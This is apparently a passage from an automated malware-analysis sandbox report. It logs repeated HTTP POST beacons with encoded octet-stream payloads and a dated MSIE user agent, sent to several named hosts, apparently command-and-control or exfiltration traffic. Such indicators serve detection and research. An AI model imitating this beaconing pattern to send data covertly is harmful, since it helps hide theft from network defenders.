79 6f 79 6e 54 38 5a 41 76 48 53 39 6d 4c 34 68 39 2b 69 78 72 74 35 51 57 69 36 77 30 59 54 50 61 43 43 39 63 66 75 58 68 54 4c 42 69 70 2b 63 4e 7a 57 64 61 6c 7a 70 53 62 73 6d 4a 76 34 33 37 42 32 57 44 31 61 34 74 64 7a 6a 42 53 74 47 57 61 64 4c 55 44 4b 4f 63 4d 39 31 67 58 4f 42 64 71 69 63 4d 64 66 31 41 77 4f 36 68 48 65 2f 51 38 42 6c 59 5a 78 6a 76 70 38 71 70 47 52 62 30 50 37 32 57 58 55 70 55 44 44 59 65 64 4b 74 6f 4b 72 38 38 57 6d 4b 31 41 39 39 64 4d 78 72 63 48 6f 72 63 43 73 4d 42 64 53 6b 34 7a 49 64 39 33 53 4c 65 73 47 42 44 58 69 49 66 77 51 4a 31 45 64 65 79 6f 4f 37 42 58 2b 34 6d 46 75 67 51 75 33 66 32 71 47 46 62 2f 45 53 79 67 70 52 71 63 79 2f 79 63 32 77 46 55 34 4c 4f 58 36 65 30 41 4b 73 39 70 39 4b 68 4c 5a 56 55 32 61 6f 41 78 2f 43 78 58 57 62 5a 57 4f 7a 4a 61 4a 78 7a 64 65 65 50 46 74 39 61 47 50 65 68 33 54 4e 4e 73 7a 50 49 4d 73 64 53 52 4b 64 7a 44 42 46 48 33 4c 6b 4d 6d 2f 76 59 50 68 44 34 66 4d 44 49 69 2b 70 52 48 59 4d 77 74 30 64 4d 61 39 59 2f 46 76 4e 31 7a 64 55 62 72 4e 6d 72 41 55 32 32 34 6c 77 66 66 6a 4d 79 31 6a 44 75 73 35 47 39 69 79 43 58 6c 31 42 44 36 35 43 6f 47 50 65 6f 64 36 36 53 6d 78 44 5a 36 42 35 2b 70 64 4f 6f 4d 57 49 4d 32 68 4f 67 4a 2b 39 33 6e 4f 4e 67 65 74 Data Ascii: DLBg7jOlhmcfd7XVeqgSRtyJubqZcypOF05orbxT94yZRZ2d35+VIu0mlhAywkH8asdcBkiVXqQ2P47WC3gEiivarKYQlArP/eiRWU9AnPn+plVorYs9KscZim09pkigb2rkV22bTfAh8yoynT8ZAvHS9mL4h9+ixrt5QWi6w0YTPaCC9cfuXhTLBip+cNzWdalzpSbsmJv437B2WD1a4tdzjBStGWadLUDKOcM91gXOBdqicMdf1AwO6hHe/Q8BlYZxjvp8qpGRb0P72WXUpUDDYedKtoKr88WmK1A99dMxrcHorcCsMBdSk4zId93SLesGBDXiIfwQJ1EdeyoO7BX+4mFugQu3f2qGFb/ESygpRqcy/yc2wFU4LOX6e0AKs9p9KhLZVU2aoAx/CxXWbZWOzJaJxzdeePFt9aGPeh3TNNszPIMsdSRKdzDBFH3LkMm/vYPhD4fMDIi+pRHYMwt0dMa9Y/FvN1zdUbrNmrAU224lwffjMy1jDus5G9iyCXl1BD65CoGPeod66SmxDZ6B5+pdOoMWIM2hOgJ+93nONget
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 45 2b 7a 58 56 71 4d 4a 69 6d 65 2f 69 76 5a 43 4b 6d 49 7a 62 38 77 62 6a 2f 33 4a 6d 50 2b 6c 68 33 6e 6c 4a 32 42 4c 58 57 35 68 66 63 64 39 5a 2f 52 54 4a 4b 38 63 32 67 76 37 37 59 5a 49 6c 44 70 73 4b 61 4b 5a 51 33 35 6b 52 4e 50 66 4c 36 32 74 75 6e 72 2b 4a 53 51 36 63 4c 34 65 55 61 74 54 61 5a 56 67 2f 5a 4b 41 46 55 77 39 30 64 38 75 6b 48 59 64 45 4e 31 42 48 42 4e 35 30 65 42 2f 6f 65 4c 68 43 34 47 39 31 59 77 65 4e 46 6a 37 63 77 38 76 4f 33 4c 76 71 7a 73 55 74 62 4d 4f 6e 44 33 79 78 38 74 7a 34 4c 6f 30 68 31 53 59 35 51 59 52 44 75 71 72 58 36 5a 4a 76 46 4e 30 72 31 36 39 38 32 52 62 53 52 57 50 63 77 43 34 43 48 36 58 43 72 33 45 75 63 67 61 57 31 4c 34 4d 30 30 73 7a 65 72 66 46 72 51 4a 53 47 51 47 31 71 31 6a 63 36 36 58 75 61 76 37 61 36 39 45 69 79 52 45 61 55 62 62 78 4e 38 48 44 68 30 32 35 6d 59 76 31 4a 6f 45 73 70 50 32 59 57 78 4c 77 36 73 6a 36 63 41 57 6b 31 44 37 36 59 32 41 64 44 77 66 35 64 66 72 4b 7a 67 59 37 59 46 75 31 64 32 75 6a 56 50 45 45 4f 5a 75 2b 6c 68 63 53 4a 52 46 49 4b 49 75 38 70 31 58 75 75 69 72 61 50 46 73 78 2b 4c 74 4f 4d 33 30 63 37 4f 33 62 76 46 2b 4c 79 76 46 35 31 32 67 42 46 61 49 2f 79 71 44 79 58 35 4a 33 48 74 37 58 66 71 6e 64 38 4c 75 6f 71 4e 79 6c 50 6b 37 2f 39 52 6b 55 47 6a 74 6e 39 4a 33 43 37 46 68 7a 4e 4d 4f 68 34 76 57 6b 63 31 36 33 70 66 45 35 75 6d 76 69 77 55 30 56 58 72 34 76 5a 61 59 65 79 4a 73 6f 4e 31 7a 38 38 4d 7a 70 58 69 6c 7a 30 36 65 42 41 39 6a 68 52 35 68 39 76 42 2b 68 66 49 61 37 66 51 61 2f 58 37 75 68 56 6b 45 6f 2f 67 4f 7a 51 6e 36 62 32 6e 6b 4c 43 33 72 4a 67 3d 3d Data Ascii: E+zXVqMJime/ivZCKmIzb8wbj/3JmP+lh3nlJ2BLXW5hfcd9Z/RTJK8c2gv77YZIlDpsKaKZQ35kRNPfL62tunr+JSQ6cL4eUatTaZVg/ZKAFUw90d8ukHYdEN1BHBN50eB/oeLhC4G91YweNFj7cw8vO3LvqzsUtbMOnD3yx8tz4Lo0h1SY5QYRDuqrX6ZJvFN0r16982RbSRWPcwC4CH6XCr3EucgaW1L4M00szerfFrQJSGQG1q1jc66Xuav7a69EiyREaUbbxN8HDh025mYv1JoEspP2YWxLw6sj6cAWk1D76Y2AdDwf5dfrKzgY7YFu1d2ujVPEEOZu+lhcSJRFIKIu8p1XuuiraPFsx+LtOM30c7O3bvF+LyvF512gBFaI/yqDyX5J3Ht7Xfqnd8LuoqNylPk7/9RkUGjtn9J3C7FhzNMOh4vWkc163pfE5umviwU0VXr4vZaYeyJsoN1z88MzpXilz06eBA9jhR5h9vB+hfIa7fQa/X7uhVkEo/gOzQn6b2nkLC3rJg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 53 34 7a 38 63 5a 54 36 63 57 65 45 2f 76 6e 6b 62 36 53 44 58 2b 66 47 2b 36 4d 4d 2f 79 45 62 43 47 6d 58 76 33 43 47 6f 33 44 62 56 4d 75 58 46 7a 32 30 4e 38 58 7a 37 6e 7a 74 42 51 54 67 64 44 63 55 61 39 72 6a 7a 37 71 75 48 2f 69 4c 63 5a 76 33 74 32 6b 57 65 6b 4a 52 68 7a 56 41 76 6d 79 39 6b 53 6e 71 56 74 59 59 47 52 78 74 4d 4e 69 4b 63 63 52 56 52 5a 46 34 45 53 37 50 62 34 51 4f 64 52 47 56 74 38 36 54 6c 56 74 32 38 67 59 64 74 4c 67 73 5a 6c 5a 71 33 4f 65 52 77 68 31 38 67 57 61 2b 77 46 66 36 7a 4c 4f 47 6b 6b 4a 75 62 4a 63 63 59 7a 39 2f 49 5a 48 6f 46 72 76 71 74 6f 34 66 66 4f 64 62 4c 37 75 55 35 32 48 4f 44 70 30 4e 78 4f 6f 68 38 75 45 73 30 36 39 75 76 77 6c 6e 4d 66 7a 75 4a 33 68 43 41 78 76 56 70 56 79 67 47 68 35 6f 32 70 53 78 4f 57 6f 6c 35 73 53 7a 30 35 4b 30 78 57 4f 6f 6e 56 2f 6e 68 6c 42 6d 48 4b 70 4b 54 4f 76 48 55 6d 78 52 64 33 35 4b 79 43 68 2f 50 76 36 4e 6b 4c 69 4f 47 56 44 52 6a 71 42 32 37 62 69 2f 56 36 36 43 49 69 78 31 73 68 7a 61 72 4e 6e 53 2b 2b 4f 43 32 68 2f 32 4a 52 63 50 43 70 36 47 2b 75 37 55 63 6d 63 72 44 69 2b 73 67 36 33 46 5a 30 54 74 62 32 79 43 49 42 33 65 48 43 48 6a 31 36 54 53 66 46 2f 31 50 51 36 6d 48 6a 43 44 32 63 34 33 4e 6d 57 74 61 71 61 38 47 6e 75 7a 79 56 52 6a 41 6b 58 72 79 2f 4a 46 38 32 50 67 62 72 57 2f 46 73 6f 37 6f 66 57 50 71 32 36 4b 35 71 36 35 66 4b 61 37 30 59 78 72 74 47 54 65 4b 34 79 69 5a 6a 78 58 32 2b 67 2f 63 32 76 7a 30 4c 61 71 52 7a 74 41 5a 36 46 42 77 6c 34 4e 74 45 6f 50 70 43 48 73 6e 76 37 4d 34 56 72 42 6b 64 6f 45 42 55 62 30 32 41 2f 35 46 4d 7a 4c 4f 66 4e 61 72 57 36 52 64 65 6b 72 4d 41 72 36 5a 4a 69 59 37 33 76 6c 53 34 43 4f 76 42 77 6a 51 41 56 73 78 70 58 54 6a 31 31 57 Data Ascii: S4z8cZT6cWeE/vnkb6SDX+fG+6MM/yEbCGmXv3CGo3DbVMuXFz20N8Xz7nztBQTgdDcUa9rjz7quH/iLcZv3t2kWekJRhzVAvmy9kSnqVtYYGRxtMNiKccRVRZF4ES7Pb4QOdRGVt86TlVt28gYdtLgsZlZq3OeRwh18gWa+wFf6zLOGkkJubJccYz9/IZHoFrvqto4ffOdbL7uU52HODp0NxOoh8uEs069uvwlnMfzuJ3hCAxvVpVygGh5o2pSxOWol5sSz05K0xWOonV/nhlBmHKpKTOvHUmxRd35KyCh/Pv6NkLiOGVDRjqB27bi/V66CIix1shzarNnS++OC2h/2JRcPCp6G+u7UcmcrDi+sg63FZ0Ttb2yCIB3eHCHj16TSfF/1PQ6mHjCD2c43NmWtaqa8GnuzyVRjAkXry/JF82PgbrW/Fso7ofWPq26K5q65fKa70YxrtGTeK4yiZjxX2+g/c2vz0LaqRztAZ6FBwl4NtEoPpCHsnv7M4VrBkdoEBUb02A/5FMzLOfNarW6RdekrMAr6ZJiY73vlS4COvBwjQAVsxpXTj11W
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 64 33 6f 6c 63 5a 6a 7a 63 57 65 50 52 41 74 79 6d 2b 49 65 72 6f 75 61 56 48 5a 67 78 76 76 59 54 4e 41 71 6b 48 6b 6f 32 5a 76 39 4e 70 59 4e 4b 56 61 75 69 57 78 62 71 58 4f 59 65 78 7a 66 45 55 49 48 53 66 71 38 5a 50 70 73 73 75 62 6f 44 30 64 47 36 62 4b 6c 43 4a 45 4a 70 72 6a 2f 36 4c 59 52 6e 5a 48 45 6e 54 55 69 34 62 79 45 45 66 69 30 38 6a 46 65 49 4b 49 6b 43 31 67 54 32 47 32 36 62 52 68 64 41 6e 6e 65 43 73 73 75 74 4a 4e 2f 47 68 78 52 31 58 31 64 66 35 31 4b 47 6c 36 52 74 43 55 69 6a 52 35 46 68 4f 2b 4d 67 72 62 62 2f 69 44 77 4a 58 69 72 6b 46 47 32 33 42 57 49 50 33 57 62 79 77 69 33 37 2b 58 55 73 6b 4f 74 57 73 53 31 55 33 41 70 36 63 51 46 48 75 72 66 70 56 74 44 44 6e 6f 69 4b 32 30 49 32 34 55 76 4b 30 58 42 63 57 37 46 78 39 44 6f 6c 34 4f 77 42 61 43 4a 79 49 31 75 6e 6a 74 59 34 35 6d 2b 72 6f 76 30 61 69 47 59 49 49 46 5a 75 61 4b 66 58 63 6d 44 6a 45 32 4f 64 4f 55 4c 65 56 69 31 42 37 72 70 52 72 75 66 4b 61 39 67 42 55 46 6a 36 46 71 2f 4b 63 35 70 49 5a 63 58 4c 6b 70 42 59 53 69 47 4a 34 46 2f 37 37 4c 38 4e 72 6a 63 33 45 37 4b 6d 44 44 35 68 45 6b 2b 46 70 63 58 78 74 4d 35 4b 48 7a 4f 4f 64 43 53 47 35 63 49 70 42 55 4e 54 68 43 76 32 30 68 6e 41 71 78 41 54 6b 79 58 54 46 4c 57 78 5a 63 37 33 36 68 7a 39 49 38 4a 45 4d 73 55 57 54 36 4d 7a 6f 30 6e 6e 75 33 4f 64 39 4f 53 6a 4d 6d 69 77 4e 6f 59 79 50 36 4e 50 77 37 4d 42 49 66 65 6b 67 4b 55 65 72 44 7a 77 2f 47 43 72 31 56 4b 65 52 52 38 78 73 49 65 6c 45 4c 4c 42 49 72 30 38 59 6e 77 73 54 78 50 4b 48 33 72 48 74 47 38 50 67 79 37 32 34 52 46 6f 58 62 4f 41 76 4b 77 30 77 37 2f 56 49 30 55 48 49 47 71 4a 57 37 57 50 41 64 52 70 4e 61 78 34 37 7a 6c 63 43 30 68 46 74 6b 37 34 74 4a 52 65 30 6a 75 5a 44 77 4f 69 41 38 3d Data Ascii: d3olcZjzcWePRAtym+IerouaVHZgxvvYTNAqkHko2Zv9NpYNKVauiWxbqXOYexzfEUIHSfq8ZPpssuboD0dG6bKlCJEJprj/6LYRnZHEnTUi4byEEfi08jFeIKIkC1gT2G26bRhdAnneCssutJN/GhxR1X1df51KGl6RtCUijR5FhO+Mgrbb/iDwJXirkFG23BWIP3Wbywi37+XUskOtWsS1U3Ap6cQFHurfpVtDDnoiK20I24UvK0XBcW7Fx9Dol4OwBaCJyI1unjtY45m+rov0aiGYIIFZuaKfXcmDjE2OdOULeVi1B7rpRrufKa9gBUFj6Fq/Kc5pIZcXLkpBYSiGJ4F/77L8Nrjc3E7KmDD5hEk+FpcXxtM5KHzOOdCSG5cIpBUNThCv20hnAqxATkyXTFLWxZc736hz9I8JEMsUWT6Mzo0nnu3Od9OSjMmiwNoYyP6NPw7MBIfekgKUerDzw/GCr1VKeRR8xsIelELLBIr08YnwsTxPKH3rHtG8Pgy724RFoXbOAvKw0w7/VI0UHIGqJW7WPAdRpNax47zlcC0hFtk74tJRe0juZDwOiA8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6e 56 55 4d 37 38 57 71 68 6d 64 39 52 61 59 51 37 42 32 4e 30 7a 36 7a 72 52 4b 54 5a 51 65 7a 79 57 74 30 64 6e 62 76 6f 42 6a 51 41 67 49 67 62 35 71 50 4a 79 56 33 76 6c 61 56 71 67 6b 4c 6e 66 59 2b 58 42 41 71 6f 44 49 69 51 62 52 33 33 63 7a 69 74 4a 6f 39 32 6c 47 4c 4e 79 6e 42 2f 6a 37 51 4a 33 2b 69 59 6e 70 44 47 47 47 61 51 30 72 73 70 44 6c 4a 48 59 39 46 6e 59 4f 50 6c 65 46 7a 71 67 46 72 43 4f 48 53 71 36 51 76 31 69 64 78 34 6d 53 4a 33 41 75 4f 30 4d 35 7a 47 4e 58 58 36 49 59 33 4c 57 72 78 6f 74 65 49 6e 69 39 39 39 6d 74 38 45 36 4f 52 37 50 73 6e 6a 79 33 44 55 65 48 48 55 46 2f 44 55 4a 39 53 69 52 70 6f 75 57 69 4b 4a 36 79 6d 6d 72 56 65 6d 76 6e 4f 55 54 77 64 2f 59 72 71 69 65 72 50 70 37 75 62 4a 75 39 6c 6a 32 64 32 52 68 35 6e 6f 4c 37 2b 35 67 74 56 73 6a 44 76 64 33 42 41 2f 63 57 36 46 45 4a 6a 6e 4b 75 55 7a 66 41 74 79 4a 70 56 73 4c 34 52 74 4c 77 42 34 6e 55 63 67 58 6b 69 44 2b 74 5a 52 44 35 77 41 39 55 54 61 48 59 68 43 6d 55 38 49 73 41 4d 35 54 76 6c 51 6f 5a 76 56 31 6d 76 6c 68 32 6d 6d 6e 52 53 6d 7a 54 59 7a 65 6e 70 4c 79 5a 2b 6b 54 73 69 2b 4f 6d 4d 52 6a 69 55 32 72 39 58 50 4d 75 68 68 53 49 42 61 33 42 4a 53 77 38 6a 67 75 34 43 2f 64 4d 6d 76 6b 39 76 53 53 47 50 42 30 54 53 4f 51 58 51 4b 61 34 52 64 36 49 33 65 4c 50 4e 65 73 46 67 4c 68 2b 61 67 79 37 43 6c 48 45 47 42 44 30 56 56 5a 42 4d 52 4c 31 43 45 48 70 47 6a 58 46 79 65 7a 32 35 68 67 6e 39 5a 70 4d 63 38 33 44 66 69 50 56 73 76 75 70 7a 4b 7a 32 75 78 2f 52 35 53 7a 48 58 53 76 48 59 38 79 52 56 57 52 6a 42 6b 65 4b 7a 30 33 73 32 50 51 30 57 67 39 6a 4d 6c 2f 71 45 55 39 56 39 78 33 79 54 2b 7a 70 42 50 65 37 36 69 57 34 3d Data Ascii: nVUM78Wqhmd9RaYQ7B2N0z6zrRKTZQezyWt0dnbvoBjQAgIgb5qPJyV3vlaVqgkLnfY+XBAqoDIiQbR33czitJo92lGLNynB/j7QJ3+iYnpDGGGaQ0rspDlJHY9FnYOPleFzqgFrCOHSq6Qv1idx4mSJ3AuO0M5zGNXX6IY3LWrxoteIni999mt8E6OR7Psnjy3DUeHHUF/DUJ9SiRpouWiKJ6ymmrVemvnOUTwd/YrqierPp7ubJu9lj2d2Rh5noL7+5gtVsjDvd3BA/cW6FEJjnKuUzfAtyJpVsL4RtLwB4nUcgXkiD+tZRD5wA9UTaHYhCmU8IsAM5TvlQoZvV1mvlh2mmnRSmzTYzenpLyZ+kTsi+OmMRjiU2r9XPMuhhSIBa3BJSw8jgu4C/dMmvk9vSSGPB0TSOQXQKa4Rd6I3eLPNesFgLh+agy7ClHEGBD0VVZBMRL1CEHpGjXFyez25hgn9ZpMc83DfiPVsvupzKz2ux/R5SzHXSvHY8yRVWRjBkeKz03s2PQ0Wg9jMl/qEU9V9x3yT+zpBPe76iW4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 45 2b 7a 58 56 71 4d 4a 69 6d 65 2f 69 76 5a 43 4b 6d 49 7a 62 38 77 62 6a 2f 33 4a 6d 50 2b 6c 68 33 6e 6c 4a 32 42 4c 58 57 35 68 66 63 64 39 5a 2f 52 54 4a 4b 38 63 32 67 76 37 37 59 5a 49 6c 44 70 73 4b 61 4b 5a 51 33 35 6b 52 4e 50 66 4c 36 32 74 75 6e 72 2b 4a 53 51 36 63 4c 34 65 55 61 74 54 61 5a 56 67 2f 5a 4b 41 46 55 77 39 30 64 38 75 6b 48 59 64 45 4e 31 42 48 42 4e 35 30 65 42 2f 6f 65 4c 68 43 34 47 39 31 59 77 65 4e 46 6a 37 63 77 38 76 4f 33 4c 76 71 7a 73 55 74 62 4d 4f 6e 44 33 79 78 38 74 7a 34 4c 6f 30 68 31 53 59 35 51 59 52 44 75 71 72 58 36 5a 4a 76 46 4e 30 72 31 36 39 38 32 52 62 53 52 57 50 63 77 43 34 43 48 36 58 43 72 33 45 75 63 67 61 57 31 4c 34 4d 30 30 73 7a 65 72 66 46 72 51 4a 53 47 51 47 31 71 31 6a 63 36 36 58 75 61 76 37 61 36 39 45 69 79 52 45 61 55 62 62 78 4e 38 48 44 68 30 32 35 6d 59 76 31 4a 6f 45 73 70 50 32 59 57 78 4c 77 36 73 6a 36 63 41 57 6b 31 44 37 36 59 32 41 64 44 77 66 35 64 66 72 4b 7a 67 59 37 59 46 75 31 64 32 75 6a 56 50 45 45 4f 5a 75 2b 6c 68 63 53 4a 52 46 49 4b 49 75 38 70 31 58 75 75 69 72 61 50 46 73 78 2b 4c 74 4f 4d 33 30 63 37 4f 33 62 76 46 2b 4c 79 76 46 35 31 32 67 42 46 61 49 2f 79 71 44 79 58 35 4a 33 48 74 37 58 66 71 6e 64 38 4c 75 6f 71 4e 79 6c 50 6b 37 2f 39 52 6b 55 47 6a 74 6e 39 4a 33 43 37 46 68 7a 4e 4d 4f 68 34 76 57 6b 63 31 36 33 70 66 45 35 75 6d 76 69 77 55 30 56 58 72 34 76 5a 61 59 65 79 4a 73 6f 4e 31 7a 38 38 4d 7a 70 58 69 6c 7a 30 36 65 42 41 39 6a 68 52 35 68 39 76 42 2b 68 66 49 61 37 66 51 61 2f 58 37 75 68 56 6b 45 6f 2f 67 4f 7a 51 6e 36 62 32 6e 6b 4c 43 33 72 4a 67 3d 3d Data Ascii: E+zXVqMJime/ivZCKmIzb8wbj/3JmP+lh3nlJ2BLXW5hfcd9Z/RTJK8c2gv77YZIlDpsKaKZQ35kRNPfL62tunr+JSQ6cL4eUatTaZVg/ZKAFUw90d8ukHYdEN1BHBN50eB/oeLhC4G91YweNFj7cw8vO3LvqzsUtbMOnD3yx8tz4Lo0h1SY5QYRDuqrX6ZJvFN0r16982RbSRWPcwC4CH6XCr3EucgaW1L4M00szerfFrQJSGQG1q1jc66Xuav7a69EiyREaUbbxN8HDh025mYv1JoEspP2YWxLw6sj6cAWk1D76Y2AdDwf5dfrKzgY7YFu1d2ujVPEEOZu+lhcSJRFIKIu8p1XuuiraPFsx+LtOM30c7O3bvF+LyvF512gBFaI/yqDyX5J3Ht7Xfqnd8LuoqNylPk7/9RkUGjtn9J3C7FhzNMOh4vWkc163pfE5umviwU0VXr4vZaYeyJsoN1z88MzpXilz06eBA9jhR5h9vB+hfIa7fQa/X7uhVkEo/gOzQn6b2nkLC3rJg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6e 56 55 4d 37 38 57 71 68 6d 64 39 52 61 59 51 37 42 32 4e 30 7a 36 7a 72 52 4b 54 5a 51 65 7a 79 57 74 30 64 6e 62 76 6f 42 6a 51 41 67 49 67 62 35 71 50 4a 79 56 33 76 6c 61 56 71 67 6b 4c 6e 66 59 2b 58 42 41 71 6f 44 49 69 51 62 52 33 33 63 7a 69 74 4a 6f 39 32 6c 47 4c 4e 79 6e 42 2f 6a 37 51 4a 33 2b 69 59 6e 70 44 47 47 47 61 51 30 72 73 70 44 6c 4a 48 59 39 46 6e 59 4f 50 6c 65 46 7a 71 67 46 72 43 4f 48 53 71 36 51 76 31 69 64 78 34 6d 53 4a 33 41 75 4f 30 4d 35 7a 47 4e 58 58 36 49 59 33 4c 57 72 78 6f 74 65 49 6e 69 39 39 39 6d 74 38 45 36 4f 52 37 50 73 6e 6a 79 33 44 55 65 48 48 55 46 2f 44 55 4a 39 53 69 52 70 6f 75 57 69 4b 4a 36 79 6d 6d 72 56 65 6d 76 6e 4f 55 54 77 64 2f 59 72 71 69 65 72 50 70 37 75 62 4a 75 39 6c 6a 32 64 32 52 68 35 6e 6f 4c 37 2b 35 67 74 56 73 6a 44 76 64 33 42 41 2f 63 57 36 46 45 4a 6a 6e 4b 75 55 7a 66 41 74 79 4a 70 56 73 4c 34 52 74 4c 77 42 34 6e 55 63 67 58 6b 69 44 2b 74 5a 52 44 35 77 41 39 55 54 61 48 59 68 43 6d 55 38 49 73 41 4d 35 54 76 6c 51 6f 5a 76 56 31 6d 76 6c 68 32 6d 6d 6e 52 53 6d 7a 54 59 7a 65 6e 70 4c 79 5a 2b 6b 54 73 69 2b 4f 6d 4d 52 6a 69 55 32 72 39 58 50 4d 75 68 68 53 49 42 61 33 42 4a 53 77 38 6a 67 75 34 43 2f 64 4d 6d 76 6b 39 76 53 53 47 50 42 30 54 53 4f 51 58 51 4b 61 34 52 64 36 49 33 65 4c 50 4e 65 73 46 67 4c 68 2b 61 67 79 37 43 6c 48 45 47 42 44 30 56 56 5a 42 4d 52 4c 31 43 45 48 70 47 6a 58 46 79 65 7a 32 35 68 67 6e 39 5a 70 4d 63 38 33 44 66 69 50 56 73 76 75 70 7a 4b 7a 32 75 78 2f 52 35 53 7a 48 58 53 76 48 59 38 79 52 56 57 52 6a 42 6b 65 4b 7a 30 33 73 32 50 51 30 57 67 39 6a 4d 6c 2f 71 45 55 39 56 39 78 33 79 54 2b 7a 70 42 50 65 37 36 69 57 34 3d Data Ascii: nVUM78Wqhmd9RaYQ7B2N0z6zrRKTZQezyWt0dnbvoBjQAgIgb5qPJyV3vlaVqgkLnfY+XBAqoDIiQbR33czitJo92lGLNynB/j7QJ3+iYnpDGGGaQ0rspDlJHY9FnYOPleFzqgFrCOHSq6Qv1idx4mSJ3AuO0M5zGNXX6IY3LWrxoteIni999mt8E6OR7Psnjy3DUeHHUF/DUJ9SiRpouWiKJ6ymmrVemvnOUTwd/YrqierPp7ubJu9lj2d2Rh5noL7+5gtVsjDvd3BA/cW6FEJjnKuUzfAtyJpVsL4RtLwB4nUcgXkiD+tZRD5wA9UTaHYhCmU8IsAM5TvlQoZvV1mvlh2mmnRSmzTYzenpLyZ+kTsi+OmMRjiU2r9XPMuhhSIBa3BJSw8jgu4C/dMmvk9vSSGPB0TSOQXQKa4Rd6I3eLPNesFgLh+agy7ClHEGBD0VVZBMRL1CEHpGjXFyez25hgn9ZpMc83DfiPVsvupzKz2ux/R5SzHXSvHY8yRVWRjBkeKz03s2PQ0Wg9jMl/qEU9V9x3yT+zpBPe76iW4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 74 77 48 76 75 35 57 78 66 47 65 36 57 73 2f 55 66 46 55 53 68 49 37 79 43 71 53 6a 54 4d 31 71 6d 66 39 45 2b 52 57 39 31 4f 70 45 68 6d 32 38 42 71 49 63 55 73 2b 72 77 61 73 70 44 79 64 66 50 76 6a 71 6c 43 41 72 4a 7a 66 59 4f 48 5a 48 61 74 67 74 66 50 57 76 6a 55 34 65 4b 6e 34 41 6a 36 54 44 5a 34 64 67 34 59 6c 77 4b 78 50 65 36 78 37 34 42 51 67 50 4c 47 61 68 4f 65 48 49 73 35 53 63 4c 53 58 39 68 63 75 37 4e 6d 49 66 6e 55 43 41 4c 72 6d 42 74 32 47 75 68 57 61 71 64 7a 71 72 42 6f 34 79 79 4f 2f 4e 53 53 75 4b 37 69 57 34 69 4d 71 44 64 7a 51 6c 78 63 75 52 59 52 6f 44 61 45 36 61 73 55 73 4d 66 59 2f 30 6b 69 6d 35 79 66 6c 63 42 50 43 50 36 47 6f 54 41 35 4a 53 6d 59 44 4b 38 73 78 46 54 68 76 6b 6a 51 72 65 61 5a 31 38 35 6b 7a 71 6a 75 44 68 65 52 52 76 53 43 73 47 74 43 58 48 39 41 44 4c 30 79 53 45 33 35 61 44 50 64 78 50 39 56 6f 4e 75 38 66 2b 77 59 6e 53 72 64 45 51 6b 6a 2f 6c 36 62 51 68 73 69 68 74 6c 72 49 37 6c 69 6b 73 35 30 6b 36 59 36 49 6c 67 7a 33 62 71 6f 49 30 77 76 4b 62 36 38 69 44 65 31 52 51 35 6a 65 31 77 6a 36 62 38 6a 51 74 42 77 70 67 62 36 64 50 55 45 2f 56 63 73 7a 68 6e 54 59 71 74 71 52 56 4f 43 76 57 4d 38 35 62 55 48 54 62 34 4d 47 51 6c 48 59 4e 78 77 61 74 56 55 42 69 54 70 5a 42 4c 6c 7a 78 45 30 49 2f 4d 64 49 4b 6d 43 68 71 71 56 67 37 34 33 6a 75 65 39 64 46 67 49 62 44 55 66 4e 70 78 4f 7a 68 44 44 77 2b 62 6d 59 65 45 78 6d 44 6c 6d 69 58 6d 7a 44 64 30 72 4f 75 55 65 73 2f 2f 4c 46 6d 38 67 37 52 41 4a 67 30 36 7a 53 79 67 54 32 67 6b 45 45 32 50 54 76 34 41 36 35 59 4a 75 53 70 57 78 4c 73 6e 54 4b 6a 58 30 43 6e 57 71 79 6c 61 57 55 66 4e 6a 78 74 38 59 70 36 54 46 56 38 79 32 41 45 Data Ascii: twHvu5WxfGe6Ws/UfFUShI7yCqSjTM1qmf9E+RW91OpEhm28BqIcUs+rwaspDydfPvjqlCArJzfYOHZHatgtfPWvjU4eKn4Aj6TDZ4dg4YlwKxPe6x74BQgPLGahOeHIs5ScLSX9hcu7NmIfnUCALrmBt2GuhWaqdzqrBo4yyO/NSSuK7iW4iMqDdzQlxcuRYRoDaE6asUsMfY/0kim5yflcBPCP6GoTA5JSmYDK8sxFThvkjQreaZ185kzqjuDheRRvSCsGtCXH9ADL0ySE35aDPdxP9VoNu8f+wYnSrdEQkj/l6bQhsihtlrI7liks50k6Y6Ilgz3bqoI0wvKb68iDe1RQ5je1wj6b8jQtBwpgb6dPUE/VcszhnTYqtqRVOCvWM85bUHTb4MGQlHYNxwatVUBiTpZBLlzxE0I/MdIKmChqqVg743jue9dFgIbDUfNpxOzhDDw+bmYeExmDlmiXmzDd0rOuUes//LFm8g7RAJg06zSygT2gkEE2PTv4A65YJuSpWxLsnTKjX0CnWqylaWUfNjxt8Yp6TFV8y2AE
